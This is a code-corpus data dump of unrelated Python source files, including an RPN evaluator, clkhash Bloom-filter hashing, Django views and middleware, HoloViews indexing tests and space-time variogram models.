id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
6409273 | <gh_stars>10-100
class Solution:
def evalRPN(self, tokens: List[str]) -> int:
stack = []
for token in tokens:
if token not in {"+", "-", "*", "/"}:
stack.append(int(token))
else:
r, l = stack.pop(), stack.pop()
if token == "+":
stack.append(l + r)
elif token == "-":
stack.append(l - r)
elif token == "*":
stack.append(l * r)
elif token == "/":
stack.append(int(l / r))
return stack[-1]
| StarcoderdataPython |
3492037 | import examples
from examples.meta import C, F
from mkapi.core.base import Docstring
from mkapi.core.docstring import parse_bases
from mkapi.core.inherit import inherit
from mkapi.core.node import get_node
def test_mro_docstring():
doc = Docstring()
parse_bases(doc, C)
assert len(doc["Bases"].items) == 2
assert doc["Bases"].items[0].type.markdown == "[examples.meta.B](!examples.meta.B)"
assert doc["Bases"].items[1].type.markdown == "[examples.meta.A](!examples.meta.A)"
doc = Docstring()
parse_bases(doc, F)
assert len(doc["Bases"].items) == 2
assert doc["Bases"].items[0].type.markdown == "[examples.meta.E](!examples.meta.E)"
assert doc["Bases"].items[1].type.markdown == "[examples.meta.D](!examples.meta.D)"
def test_mro_node():
node = get_node(C)
assert len(node.members) == 2
assert node.members[0].object.id == "examples.meta.A.f"
assert node.members[1].object.id == "examples.meta.C.g"
def test_mro_inherit():
node = get_node(C)
inherit(node)
item = node.members[1].docstring["Parameters"].items[0]
assert item.description.markdown == "parameter."
def test_mro_module():
node = get_node(examples.meta)
assert len(node.members) == 6
| StarcoderdataPython |
1834712 | <filename>clkhash/clk.py<gh_stars>10-100
"""
Generate CLK from data.
"""
import concurrent.futures
import csv
import logging
import time
from typing import (AnyStr, Callable, cast, Iterable, List, Optional,
Sequence, TextIO, Tuple, TypeVar, Union)
from bitarray import bitarray
from tqdm import tqdm
from clkhash.bloomfilter import stream_bloom_filters
from clkhash.serialization import serialize_bitarray
from clkhash.key_derivation import generate_key_lists
from clkhash.schema import Schema
from clkhash.stats import OnlineMeanVariance
from clkhash.validate_data import (validate_entries, validate_header,
validate_row_lengths)
log = logging.getLogger('clkhash.clk')
CHUNK_SIZE = 1000
def hash_chunk(chunk_pii_data: Sequence[Sequence[str]],
keys: Sequence[Sequence[bytes]],
schema: Schema
) -> Tuple[List[bitarray], Sequence[int]]:
"""
Generate Bloom filters (ie hash) from chunks of PII.
It also computes and outputs the Hamming weight (or popcount) -- the number of bits
set to one -- of the generated Bloom filters.
:param chunk_pii_data: An iterable of indexable records.
:param keys: A tuple of two lists of keys used in the HMAC. Should have been created by `generate_key_lists`.
:param Schema schema: Schema specifying the entry formats and
hashing settings.
:return: A list of Bloom filters as bitarrays and a list of corresponding popcounts
"""
clk_data = []
clk_popcounts = []
for clk in stream_bloom_filters(chunk_pii_data, keys, schema):
clk_data.append(clk[0])
clk_popcounts.append(clk[2])
return clk_data, clk_popcounts
def generate_clk_from_csv(input_f: TextIO,
secret: AnyStr,
schema: Schema,
validate: bool = True,
header: Union[bool, AnyStr] = True,
progress_bar: bool = True,
max_workers: Optional[int] = None
) -> List[bitarray]:
""" Generate Bloom filters from CSV file, then serialise them.
This function also computes and outputs the Hamming weight
(a.k.a popcount -- the number of bits set to high) of the
generated Bloom filters.
:param input_f: A file-like object of csv data to hash.
:param secret: A secret.
:param schema: Schema specifying the record formats and
hashing settings.
:param validate: Set to `False` to disable validation of
data against the schema. Note that this will silence
warnings whose aim is to keep the hashes consistent between
data sources; this may affect linkage accuracy.
:param header: Set to `False` if the CSV file does not have
a header. Set to `'ignore'` if the CSV file does have a
header but it should not be checked against the schema.
:param bool progress_bar: Set to `False` to disable the progress
bar.
:param int max_workers: Passed to ProcessPoolExecutor except for the
special case where the value is 1, in which case no processes
or threads are used. This may be useful or required on platforms
that are not capable of spawning subprocesses.
:return: A list of Bloom filters as bitarrays and a list of
corresponding popcounts.
"""
if header not in {False, True, 'ignore'}:
raise ValueError("header must be False, True or 'ignore' but is {!s}."
.format(header))
log.info("Hashing data")
# Read from CSV file
reader = csv.reader(input_f)
if header:
column_names = next(reader)
if header != 'ignore':
validate_header(schema.fields, column_names)
start_time = time.time()
# Read the lines in CSV file and add it to PII
pii_data = []
for line in reader:
pii_data.append(tuple(element.strip() for element in line))
validate_row_lengths(schema.fields, pii_data)
if progress_bar:
stats = OnlineMeanVariance()
with tqdm(desc="generating CLKs", total=len(pii_data), unit='clk', unit_scale=True,
postfix={'mean': stats.mean(), 'std': stats.std()}) as pbar:
def callback(tics, clk_stats):
stats.update(clk_stats)
pbar.set_postfix(mean=stats.mean(), std=stats.std(), refresh=False)
pbar.update(tics)
results = generate_clks(pii_data,
schema,
secret,
validate=validate,
callback=callback,
max_workers=max_workers
)
else:
results = generate_clks(pii_data,
schema,
secret,
validate=validate,
max_workers=max_workers
)
log.info("Hashing took {:.2f} seconds".format(time.time() - start_time))
return results
def generate_clks(pii_data: Sequence[Sequence[str]],
schema: Schema,
secret: AnyStr,
validate: bool = True,
callback: Optional[Callable[[int, Sequence[int]], None]] = None,
max_workers: Optional[int] = None
) -> List[bitarray]:
# Generate two keys for each identifier from the secret, one key per hashing method used when computing
# the bloom filters.
# Otherwise it could create more if required using the parameter `num_hashing_methods` in `generate_key_lists`
key_lists = generate_key_lists(
secret,
len(schema.fields),
key_size=schema.kdf_key_size,
salt=schema.kdf_salt,
info=schema.kdf_info,
kdf=schema.kdf_type,
hash_algo=schema.kdf_hash)
if validate:
validate_entries(schema.fields, pii_data)
# Chunks PII
log.info("Hashing {} entities".format(len(pii_data)))
chunk_size = 200 if len(pii_data) <= 10000 else 1000
futures = []
if max_workers is None or max_workers > 1:
# Compute Bloom filter from the chunks and then serialise it
with concurrent.futures.ProcessPoolExecutor(max_workers=max_workers) as executor:
for chunk in chunks(pii_data, chunk_size):
future = executor.submit(
hash_chunk,
chunk, key_lists, schema, )
if callback is not None:
unpacked_callback = cast(Callable[[int, Sequence[int]], None],
callback)
future.add_done_callback(
lambda f: unpacked_callback(len(f.result()[0]),
f.result()[1]))
futures.append(future)
results = []
for future in futures:
clks, clk_stats = future.result()
results.extend(clks)
else:
results = []
for chunk in chunks(pii_data, chunk_size):
clks, clk_stats = hash_chunk(chunk, key_lists, schema)
if callback is not None:
unpacked_callback = cast(Callable[[int, Sequence[int]], None], callback)
unpacked_callback(len(clks), clk_stats)
results.extend(clks)
return results
T = TypeVar('T') # Declare generic type variable
def chunks(seq: Sequence[T], chunk_size: int) -> Iterable[Sequence[T]]:
""" Split seq into chunk_size-sized chunks.
:param seq: A sequence to chunk.
:param chunk_size: The size of chunk.
"""
return (seq[i:i + chunk_size] for i in range(0, len(seq), chunk_size))
| StarcoderdataPython |
234326 | from .setup_structlog import setup_structlog
setup_structlog()
| StarcoderdataPython |
1925428 | <filename>core/middleware.py
from django.db.models import signals
from django.utils.functional import curry
class AuditMiddleware(object):
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
if request.method not in ('GET', 'HEAD', 'OPTIONS', 'TRACE'):
if hasattr(request, 'user') and request.user.is_authenticated:
user = request.user
else:
user = None
mark_whodid = curry(self.mark_whodid, user)
signals.pre_save.connect(mark_whodid, dispatch_uid=(self.__class__, request,), weak=False)
response = self.get_response(request)
response = self.process_response(request, response)
return response
def process_response(self, request, response):
signals.pre_save.disconnect(dispatch_uid=(self.__class__, request,))
return response
def mark_whodid(self, user, sender, instance, **kwargs):
if not getattr(instance, 'criado_por_id', None):
instance.criado_por = user
if hasattr(instance, 'atualizado_por'):
instance.atualizado_por = user
| StarcoderdataPython |
1920135 | <gh_stars>0
from ..data_object.pyradiomics_response import NumpyArrayEncoder
from ..models.SitkImage import get_metadata_dictionary
import os
import SimpleITK as sitk
from django.http import HttpResponse, JsonResponse
from django.conf import settings
def handle(request, idImage=''):
method = request.method
if(method == 'DELETE'):
delete_image(idImage)
return HttpResponse(status=200)
if(method == 'GET'):
metadata = get_metadata(idImage)
return JsonResponse(metadata, NumpyArrayEncoder)
def delete_image(idImage: str) -> None:
"""[Delete the Image]
Args:
idImage (str): [Input idImage]
Removes the specified image
"""
os.remove(settings.STORAGE_DIR+"/image/image_"+idImage+".nii")
def get_metadata(idImage: str) -> dict:
"""[Get the metadata from an image]
Args:
idImage (str): [Input image]
Returns:
dict: [return formated dictionary ready ready to be sent as a JSON]
"""
path = settings.STORAGE_DIR+"/image/image_"+idImage+".nii"
image = sitk.ReadImage(path)
return get_metadata_dictionary(image)
| StarcoderdataPython |
4917831 | from setuptools import setup, find_packages
def get_tag():
f = open('VERSION', 'r')
tag = f.read().strip()
f.close()
return tag
def get_description():
f = open('README', 'r')
desc = f.read()
f.close()
return desc
setup(name='hailc',
version=get_tag(),
description='Lightly reviewed community code snippets for Hail.',
long_description=get_description(),
url='https://github.com/hail-is/hail-contrib',
author='<NAME>',
author_email='<EMAIL>',
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7'
],
keywords='bioinformatics genomics spark hail',
packages=find_packages()
)
| StarcoderdataPython |
224793 | <gh_stars>1-10
#!/usr/bin/python
# -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
from eospac import EosMaterial
from eospac.eospac.libsesio import _write_sesbin
import numpy as np
from numpy.testing import assert_allclose
def is_equal(x,y):
assert x == y
| StarcoderdataPython |
9601800 | from .pen import Pen
class PenCollection:
def __init__(self, initialisation_collection):
self.pens = {}
i = 0
for p in initialisation_collection:
self.pens[i] = Pen(p["brand"], p["name"], rgb=p["rgb"])
i = i+1
def closest_pen_to_colour(self, colour):
closest_distance = self.pens[0].colour.distance_to_colour(colour)
closest_pen = self.pens[0]
for pen in self.pens.values():
distance = pen.colour.distance_to_colour(colour)
if distance < closest_distance:
closest_distance = distance
closest_pen = pen
return closest_pen
def find_complementary_pen(self, pen=None, colour=None):
if pen is not None:
complementary_colour = pen.colour.complementary_colour()
return self.closest_pen_to_colour(complementary_colour)
elif colour is not None:
return self.closest_pen_to_colour(colour)
else:
raise ValueError("Must pass in either a colour or pen")
def find_analogous_pens(self, pen):
analogous_pens = []
analogous_colours = pen.colour.analogous_colours()
for colour in analogous_colours:
closest_pen = self.closest_pen_to_colour(colour)
analogous_pens.append(closest_pen)
return analogous_pens
def find_split_complementary_pens(self, pen):
split_complementary_pens = []
split_complementary_colours = pen.colour.split_complementary()
for colour in split_complementary_colours:
closest_pen = self.closest_pen_to_colour(colour)
split_complementary_pens.append(closest_pen)
return split_complementary_pens
def find_pen_by_pen_number(self, pen_number):
for pen in self.pens.values():
if pen_number in pen.name:
return pen
raise ValueError("Pen does not exist in collection")
| StarcoderdataPython |
11306516 | <gh_stars>1-10
from math import floor
from pathlib import Path
from sys import argv
def main():
file_path = Path(argv[1])
with file_path.open() as file:
result = 0
while text := file.readline().strip():
number = floor(int(text) / 3) - 2
result += number
print(result)
if __name__ == '__main__':
main()
| StarcoderdataPython |
8002632 | <reponame>htlcnn/ironpython-stubs
class TriangulatedShellComponent(object,IDisposable):
"""
This class represents a triangulated boundary component of a solid or a
triangulated connected component of a shell.
"""
def Clear(self):
"""
Clear(self: TriangulatedShellComponent)
Empties the contents of this TriangulatedShellComponent.
"""
pass
def Dispose(self):
""" Dispose(self: TriangulatedShellComponent) """
pass
def GetTriangle(self,triangleIndex):
"""
GetTriangle(self: TriangulatedShellComponent,triangleIndex: int) -> TriangleInShellComponent
Returns the triangle corresponding to the given index.
triangleIndex: The index of the triangle (between 0 and TriangleCount-1,inclusive).
Returns: The triangle.
"""
pass
def GetVertex(self,vertexIndex):
"""
GetVertex(self: TriangulatedShellComponent,vertexIndex: int) -> XYZ
Returns the vertex with a given index.
vertexIndex: The index of the vertex (between 0 and getVertexCount()-1,inclusive).
Returns: A copy of the requested vertex.
"""
pass
def ReleaseUnmanagedResources(self,*args):
""" ReleaseUnmanagedResources(self: TriangulatedShellComponent,disposing: bool) """
pass
def __enter__(self,*args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self,*args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __repr__(self,*args):
""" __repr__(self: object) -> str """
pass
IsClosed=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""True if and only if the triangulation represents a topologically closed shell
(i.e.,each edge is shared by two triangles).
Get: IsClosed(self: TriangulatedShellComponent) -> bool
"""
IsValidObject=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Specifies whether the .NET object represents a valid Revit entity.
Get: IsValidObject(self: TriangulatedShellComponent) -> bool
"""
TriangleCount=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""The number of triangles in the triangulation.
Get: TriangleCount(self: TriangulatedShellComponent) -> int
"""
VertexCount=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""The number of vertices in the triangulation.
Get: VertexCount(self: TriangulatedShellComponent) -> int
"""
| StarcoderdataPython |
8063591 | <reponame>Stevesie/stevesie-py
import pytest
@pytest.fixture
def app():
return {
"id": "e43a024d-9e16-41ea-8d16-b8b0e8d88464",
"name": "App",
"description": "Access your account programmatically.",
"website": "https://test.com/",
"slug": "test",
"createdAt": "2016-06-30 02:08:06",
"updatedAt": "2018-04-21 13:13:09",
"isPublic": True,
"iconUrl": "/assets/media/test.png"
}
| StarcoderdataPython |
9796323 | <filename>tests/testelementindexing.py
"""
Test cases for both indexing and slicing of elements
"""
import numpy as np
from holoviews import Histogram, QuadMesh
from holoviews.element.comparison import ComparisonTestCase
class HistogramIndexingTest(ComparisonTestCase):
def setUp(self):
self.values = [i for i in range(10)]
self.edges = [i for i in range(11)]
self.hist=Histogram(self.values, self.edges)
def test_slice_all(self):
sliced = self.hist[:]
self.assertEqual(np.all(sliced.values == self.values), True)
self.assertEqual(np.all(sliced.edges == self.edges), True)
def test_slice_exclusive_upper(self):
"Exclusive upper boundary semantics for bin centers"
sliced = self.hist[:6.5]
self.assertEqual(np.all(sliced.values == [0, 1, 2, 3, 4, 5]), True)
self.assertEqual(np.all(sliced.edges == [0, 1, 2, 3, 4, 5, 6]), True)
def test_slice_exclusive_upper_exceeded(self):
"Slightly above the boundary in the previous test"
sliced = self.hist[:6.55]
self.assertEqual(np.all(sliced.values == [0, 1, 2, 3, 4, 5, 6]), True)
self.assertEqual(np.all(sliced.edges == [0, 1, 2, 3, 4, 5, 6, 7]), True)
def test_slice_inclusive_lower(self):
"Inclusive lower boundary semantics for bin centers"
sliced = self.hist[3.5:]
self.assertEqual(np.all(sliced.values == [3, 4, 5, 6, 7, 8, 9]), True)
self.assertEqual(np.all(sliced.edges == [3, 4, 5, 6, 7, 8, 9, 10]), True)
def test_slice_inclusive_lower_undershot(self):
"Inclusive lower boundary semantics for bin centers"
sliced = self.hist[3.45:]
self.assertEqual(np.all(sliced.values == [3, 4, 5, 6, 7, 8, 9]), True)
self.assertEqual(np.all(sliced.edges == [3, 4, 5, 6, 7, 8, 9, 10]), True)
def test_slice_bounded(self):
sliced = self.hist[3.5:6.5]
self.assertEqual(np.all(sliced.values == [3, 4, 5]), True)
self.assertEqual(np.all(sliced.edges == [3, 4, 5, 6]), True)
def test_slice_lower_out_of_bounds(self):
sliced = self.hist[-3:]
self.assertEqual(np.all(sliced.values == self.values), True)
self.assertEqual(np.all(sliced.edges == self.edges), True)
def test_slice_upper_out_of_bounds(self):
sliced = self.hist[:12]
self.assertEqual(np.all(sliced.values == self.values), True)
self.assertEqual(np.all(sliced.edges == self.edges), True)
def test_slice_both_out_of_bounds(self):
sliced = self.hist[-3:13]
self.assertEqual(np.all(sliced.values == self.values), True)
self.assertEqual(np.all(sliced.edges == self.edges), True)
def test_scalar_index(self):
self.assertEqual(self.hist[4.5], 4)
self.assertEqual(self.hist[3.7], 3)
self.assertEqual(self.hist[9.9], 9)
def test_scalar_index_boundary(self):
"""
Scalar at boundary indexes next bin.
(exclusive upper boundary for current bin)
"""
self.assertEqual(self.hist[4], 4)
self.assertEqual(self.hist[5], 5)
def test_scalar_lowest_index(self):
self.assertEqual(self.hist[0], 0)
def test_scalar_lowest_index_out_of_bounds(self):
try:
self.hist[-0.1]
except Exception as e:
if not str(e).startswith("'Key value -0.1 is out of the histogram bounds"):
raise AssertionError("Out of bound exception not generated")
def test_scalar_highest_index_out_of_bounds(self):
try:
self.hist[10]
except Exception as e:
if not str(e).startswith("'Key value 10 is out of the histogram bounds"):
raise AssertionError("Out of bound exception not generated")
class QuadMeshIndexingTest(ComparisonTestCase):
def setUp(self):
n = 4
self.xs = np.logspace(1, 3, n)
self.ys = np.linspace(1, 10, n)
self.zs = np.arange((n-1)**2).reshape(n-1, n-1)
self.qmesh = QuadMesh((self.xs, self.ys, self.zs))
def test_qmesh_index_lower_left(self):
self.assertEqual(self.qmesh[0, 0], 0)
def test_qmesh_index_lower_right(self):
self.assertEqual(self.qmesh[800, 3.9], 2)
def test_qmesh_index_top_left(self):
self.assertEqual(self.qmesh[10, 9.9], 6)
def test_qmesh_index_top_right(self):
self.assertEqual(self.qmesh[216, 7], 8)
def test_qmesh_index_xcoords(self):
sliced = QuadMesh((self.xs[2:4], self.ys, self.zs[:, 2:3]))
self.assertEqual(self.qmesh[300, :], sliced)
def test_qmesh_index_ycoords(self):
sliced = QuadMesh((self.xs, self.ys[-2:], self.zs[-1:, :]))
self.assertEqual(self.qmesh[:, 7], sliced)
def test_qmesh_slice_xcoords(self):
sliced = QuadMesh((self.xs[1:], self.ys, self.zs[:, 1:]))
self.assertEqual(self.qmesh[100:1000, :], sliced)
def test_qmesh_slice_ycoords(self):
sliced = QuadMesh((self.xs, self.ys[:-1], self.zs[:-1, :]))
self.assertEqual(self.qmesh[:, 2:7], sliced)
def test_qmesh_slice_xcoords_ycoords(self):
sliced = QuadMesh((self.xs[1:], self.ys[:-1], self.zs[:-1, 1:]))
self.assertEqual(self.qmesh[100:1000, 2:7], sliced)
| StarcoderdataPython |
6471400 | <filename>skgstat/stmodels.py
from functools import wraps
import numpy as np
def stvariogram(func):
@wraps(func)
def wrapper(*args, **kwargs):
st = args[0]
if st.ndim == 2:
new_args = args[1:]
mapping = map(lambda lags: func(lags, *new_args, **kwargs), st)
return np.fromiter(mapping, dtype=float)
else:
return func(*args, **kwargs)
return wrapper
@stvariogram
def sum(lags, Vx, Vt):
"""Sum space-time model
Separable space-time variogram model. This is the most basic model as the
two marginal models of the space and time axis are simply summed up for
each lag pair. Further, there are no fitting parameters.
Please consider the notes before using this model.
Parameters
----------
lags : tuple
Tuple of the space (x) and time (t) lag given as tuple: (x, t) which
will be used to calculate the dependent semivariance.
Vx : skgstat.Variogram.fitted_model
instance of the space marginal variogram with a fitted theoretical
model sufficiently describing the marginal. If this model does not fit
the experimental variogram, the space-time model fit will be poor as
well.
Vt : skgstat.Variogram.fitted_model
instance of the time marginal variogram with a fitted theoretical
model sufficiently describing the marginal. If this model does not fit
the experimental variogram, the space-time model fit will be poor as
well.
Returns
-------
gamma : float
The semi-variance modeled for the given lags.
Notes
-----
This model is implemented like:
.. math::
\gamma (h,t) = \gamma_x (h) + \gamma_t (t)
Where :math:`\gamma_x(h)` is the spatial marginal variogram and
:math:`\gamma_t(t)` is the temporal marginal variogram.
It is not a good idea to use this model in almost any case, as it assumes
the covariance field to be isotropic in space and time direction,
which will hardly be true. Further, it might not be strictly definite as
shown by [7]_, [8]_, [9]_.
References
----------
.. [7] <NAME>., <NAME>. (1990), Variograms with Zonal
Anisotropies and Non-Invertible Kriging Systems.
Mathematical Geology 22, 779-785.
.. [8] <NAME>. and <NAME>. (1994), Spatiotemporal modeling:
covariances and ordinary kriging systems, in R. Dimitrakopoulos,
(ed.) Geostatistics for the next century, Kluwer Academic Publishers,
Dodrecht 88-93.
"""
h, t = lags
return Vx(h) + Vt(t)
@stvariogram
def product(lags, Vx, Vt, Cx, Ct):
"""Product model
Separable space-time variogram model. This model is based on the product
of the marginal space and time models.
Parameters
----------
lags : tuple
Tuple of the space (x) and time (t) lag given as tuple: (x, t) which
will be used to calculate the dependent semivariance.
Vx : skgstat.Variogram.fitted_model
instance of the space marginal variogram with a fitted theoretical
model sufficiently describing the marginal. If this model does not fit
the experimental variogram, the space-time model fit will be poor as
well.
Vt : skgstat.Variogram.fitted_model
instance of the time marginal variogram with a fitted theoretical
model sufficiently describing the marginal. If this model does not fit
the experimental variogram, the space-time model fit will be poor as
well.
Cx : float
Marginal space sill.
Ct : float
Marignal time sill.
Returns
-------
gamma : float
The semi-variance modeled for the given lags.
Notes
-----
The product sum model is implemented following [14]_:
.. math::
\gamma (h,t) = C_x * \gamma_t(t) + C_t * \gamma_x(h) - \gamma_x(h) * \gamma_t(t)
Where :math:`\gamma_x(h)` is the spatial marginal variogram and
:math:`\gamma_t(t)` is the temporal marginal variogram.
References
----------
.. [14] <NAME>., <NAME>., and <NAME>. (201b), FORTRAN 77 programs
for space-time modeling, Computers & Geoscience 28, 205-212.
"""
h, t = lags
return Cx * Vt(t) + Ct * Vx(h) - Vx(h) * Vt(t)
@stvariogram
def product_sum(lags, Vx, Vt, k1, k2, k3, Cx, Ct):
"""Product-Sum space-time model
Separable space-time variogram model, based on a combination of 'sum' and
'product' models. Both base models are based on separated marginal
variograms for the space and time axis.
Parameters
----------
lags : tuple
Tuple of the space (x) and time (t) lag given as tuple: (x, t) which
will be used to calculate the dependent semivariance.
Vx : skgstat.Variogram.fitted_model
instance of the space marginal variogram with a fitted theoretical
model sufficiently describing the marginal. If this model does not fit
the experimental variogram, the space-time model fit will be poor as
well.
Vt : skgstat.Variogram.fitted_model
instance of the time marginal variogram with a fitted theoretical
model sufficiently describing the marginal. If this model does not fit
the experimental variogram, the space-time model fit will be poor as
well.
k1 : float
Fitting parameter. k1 has to be positive or zero and may not be larger
than all marginal sill values.
k2 : float
Fitting paramter. k2 has to be positive or zero and may not be larger
than all marginal sill values.
k3 : float
Fitting parameter. k3 has to be positive and may not be larger than
all marginal sill values.
Cx : float
Marginal space sill.
Ct : float
Marignal time sill.
Returns
-------
gamma : float
The semi-variance modeled for the given lags.
Notes
-----
This model implements the product-sum model as suggested by
<NAME> et. al [15]_, [16]_:
.. math::
\\gamma_{ST}(h_s, h_t) = [k_1C_T(0) + k_2]*\\gamma_S(h_s) +
[k_1C_s(0) + k_3]\\gamma_T(h_t) - k_1\\gamma_s(h_s) x \\gamma_T(h_t)
References
----------
.. [15] <NAME>., <NAME>. and <NAME>. (2001a), Product-sum
covariance for space-time mdeling, Environmetrics 12, 11-23.
.. [16] <NAME>., <NAME>., and <NAME>. (201b), FORTRAN 77 programs
for space-time modeling, Computers & Geoscience 28, 205-212.
"""
h, t = lags
return (k2 + k1*Ct)*Vx(h) + (k3 + k1*Cx) * Vt(t) - k1 * Vx(h) * Vt(t)
| StarcoderdataPython |
8114374 | <reponame>joonyoungleeduke/MatchMe
from django.db import models
from django.contrib.auth.models import User, Group
from django.dispatch import receiver
from django.db.models.signals import post_save
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
bio = models.TextField(blank=True, default='')
ind_matches = models.IntegerField(blank=True, default=0)
total_matches = models.IntegerField(blank=True, default=0)
preference1 = models.CharField(max_length=100)
preference2 = models.CharField(max_length=100)
preference3 = models.CharField(max_length=100)
image = models.ImageField(upload_to='profile_pictures', default='default_profile.jpg')
@receiver(post_save, sender=User)
def create_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(user=instance).save() | StarcoderdataPython |
9775591 | <filename>community_pulse/questions/tests/test_admin.py
from django.contrib import admin
from django.test import TestCase
from ..admin import QuestionAdmin
from ..models import Question
class QuestionAdminTest(TestCase):
def test_admin_should_be_registered(self):
assert isinstance(admin.site._registry[Question], QuestionAdmin)
def test_admin_should_set_list_display(self):
expected = ('title', 'event', 'created', 'modified',)
assert QuestionAdmin.list_display == expected
def test_admin_should_set_list_filter(self):
expected = ('event__name', 'type',)
assert QuestionAdmin.list_filter == expected
def test_admin_should_set_search_fields(self):
expected = ('title',)
assert QuestionAdmin.search_fields == expected
| StarcoderdataPython |
8064928 | from django.core.urlresolvers import reverse_lazy
from django.http import HttpResponseForbidden
from django.shortcuts import get_object_or_404
from django.views.generic.base import TemplateView
from django.views.generic.list import ListView
from django.views.generic.edit import CreateView, UpdateView, DeleteView, \
FormView
from . import sepa
from . import forms
from . import models
# Create your views here.
CLIENTE_FIELDS = [
'referencia', 'nombre', 'nif', 'direccion', 'codpostal', 'poblacion',
'provincia', 'email', 'bic', 'iban'
]
COBRO_FIELDS = [
'servicio', 'referencia', 'concepto', 'fecha', 'tipo', 'importe'
]
EMPRESA_FIELDS = [
'cod_pais', 'tipo_presentador', 'nombre', 'nif', 'direccion', 'codpostal',
'poblacion', 'provincia', 'bic', 'iban', 'presentador'
]
DOMICILIACION_FIELDS = [
'referencia', 'fecha_firma', 'recurrente', 'cdtr_nif', 'cdtr_nombre',
'cdtr_direccion', 'cdtr_codpostal', 'cdtr_poblacion', 'cdtr_provincia',
'cdtr_pais', 'dbtr_nif', 'dbtr_nombre', 'dbtr_direccion', 'dbtr_codpostal',
'dbtr_poblacion', 'dbtr_provincia', 'dbtr_bic', 'dbtr_iban'
]
SERVICIO_FIELDS = [
'cliente', 'fecha', 'descripcion', 'importe', 'periodicidad'
]
REMESA_FIELDS = [
'presentador', 'referencia', 'fecha'
]
class IndexView(TemplateView):
template_name = 'serp/base.html'
# ----- CLIENTES -----
class ClienteListView(ListView):
model = models.Cliente
class ClienteCreateView(CreateView):
model = models.Cliente
fields = CLIENTE_FIELDS
class ClienteUpdateView(UpdateView):
model = models.Cliente
fields = CLIENTE_FIELDS
class ClienteDeleteView(DeleteView):
model = models.Cliente
success_url = reverse_lazy('serp:cliente-list')
# ----- COBRO -----
class CobroListView(ListView):
model = models.Cobro
tipo = ""
def get_queryset(self):
datos = super(self.__class__, self).get_queryset()
self.tipo = self.request.GET.get('tipo')
if self.tipo:
datos_filtro = datos.filter(tipo=self.tipo)
else:
datos_filtro = datos
return datos_filtro
def get_context_data(self, **kwargs):
contexto = super(self.__class__, self).get_context_data(**kwargs)
cobros = self.object_list
total = 0
for cobro in cobros:
if cobro.tipo == 'I':
total += cobro.importe
else:
total -= cobro.importe
contexto['total_base_imp'] = 0
contexto['diferencia_base_imp'] = 0 * 21 / 100
contexto['total_iva'] = 0
contexto['total'] = total
contexto['tipo'] = self.tipo
return contexto
class CobroCreateView(CreateView):
model = models.Cobro
fields = COBRO_FIELDS
class CobroUpdateView(UpdateView):
model = models.Cobro
fields = COBRO_FIELDS
class CobroDeleteView(DeleteView):
model = models.Cobro
success_url = reverse_lazy('serp:cobro-list')
class SepaXmlView(FormView):
form_class = forms.SepaTest
template_name = 'serp/sepa_xml.html'
def form_valid(self, form):
id_domiciliacion = int(self.request.GET.get('domiciliacion'))
domiciliacion = models.Domiciliacion.objects.get(pk=id_domiciliacion)
return sepa.generate_content(domiciliacion, form.descripcion,
form.importe)
# ----- EMPRESA -----
class EmpresaUpdateView(UpdateView):
model = models.Empresa
fields = EMPRESA_FIELDS
def get(self, request, **kwargs):
pk = int(kwargs['pk'])
if pk != 1:
return HttpResponseForbidden('Acceso prohibido')
else:
return super(self.__class__, self).get(self, request, **kwargs)
def get_queryset(self):
if models.Empresa.objects.count() == 0:
empresa = models.Empresa()
empresa.save()
return models.Empresa.objects.all()
# ----- DOMICILIACION -----
class DomiciliacionListView(ListView):
model = models.Domiciliacion
class DomiciliacionCreateView(CreateView):
model = models.Domiciliacion
fields = DOMICILIACION_FIELDS
class DomiciliacionUpdateView(UpdateView):
model = models.Domiciliacion
fields = DOMICILIACION_FIELDS
class DomiciliacionDeleteView(DeleteView):
model = models.Domiciliacion
success_url = reverse_lazy('serp:domiciliacion-list')
# ----- SERVICIO -----
class ServicioListView(ListView):
model = models.Servicio
model_name = 'servicio'
def get_queryset(self):
pk_cliente = self.kwargs.get('pk_cliente')
if pk_cliente:
cliente = get_object_or_404(models.Cliente, pk=pk_cliente)
datos = self.model.objects.filter(cliente=cliente)
else:
datos = super(self.__class__, self).get_queryset()
return datos
def get_context_data(self, **kwargs):
pk_cliente = self.kwargs.get('pk_cliente')
if pk_cliente:
self.model_name = 'cliente-servicio'
self.pk_cliente = pk_cliente
kwargs['model_name'] = self.model_name
return super(self.__class__, self).get_context_data(**kwargs)
class ServicioCreateView(CreateView):
model = models.Servicio
fields = SERVICIO_FIELDS
pk_refs_fields = [('pk_cliente', 'cliente')]
def get_context_data(self, **kwargs):
if 'pk_refs' not in kwargs:
for pk_ref, _ in self.pk_refs_fields:
if pk_ref in self.kwargs:
kwargs[pk_ref] = self.kwargs[pk_ref]
return super(self.__class__, self).get_context_data(**kwargs)
def get_form(self, form_class=None):
form = super(self.__class__, self).get_form(form_class=form_class)
for pk_ref, field_ref in self.pk_refs_fields:
if pk_ref in self.kwargs:
if field_ref in form.fields:
form.initial[field_ref] = self.kwargs[pk_ref]
form.fields[field_ref].widget.attrs['disabled'] = True
return form
def post(self, request, *args, **kwargs):
data = request.POST.copy()
for pk_ref, field_ref in self.pk_refs_fields:
if (pk_ref in kwargs) and (field_ref not in data):
data[field_ref] = str(kwargs[pk_ref])
request.POST = data
return super(self.__class__, self).post(request, *args, **kwargs)
# ----- REMESA -----
class RemesaListView(ListView):
model = models.Remesa
class RemesaCreateView(CreateView):
model = models.Remesa
fields = REMESA_FIELDS
| StarcoderdataPython |
212839 | import sys, os
import time
import argparse
import numpy as np
from bilby.core.prior import Uniform as bilbyUniform
from bilby.core.prior import DeltaFunction as bilbyDeltaFunction
from bilby.core.prior import Gaussian as bilbyGaussian
